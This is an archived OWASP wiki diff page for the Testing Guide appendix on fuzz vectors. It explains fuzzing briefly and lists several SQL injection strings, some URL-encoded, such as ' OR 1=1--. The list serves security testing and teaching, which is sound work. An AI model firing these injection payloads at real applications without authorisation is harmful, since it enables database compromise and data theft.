This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "OWASP Testing Guide Appendix C: Fuzz Vectors"
| Line 5: | Line 5: | ||
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required: | Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required: | ||
| − | + | <nowiki>' OR 1=1--</nowiki><br> | |
| − | <nowiki>' OR 1=1-- < | + | <nowiki>OR 1=1</nowiki><br> |
| − | OR 1=1 < | + | <nowiki>' OR '1'='1</nowiki><br> |
| − | ' OR '1'='1 | + | <nowiki>; OR '1'='1'</nowiki><br> |
| − | ; OR '1'='1' | ||
%22+or+isnull%281%2F0%29+%2F* | %22+or+isnull%281%2F0%29+%2F* | ||
%27+OR+%277659%27%3D%277659 | %27+OR+%277659%27%3D%277659 | ||
%22+or+isnull%281%2F0%29+%2F* | %22+or+isnull%281%2F0%29+%2F* | ||
| − | %27+--+ | + | %27+--+ |
Revision as of 16:34, 7 September 2006
The following are fuzzing vectors which can be used with webscarab or another fuzzer. Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing. This is the simple part of the discovery phase. Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required:
' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
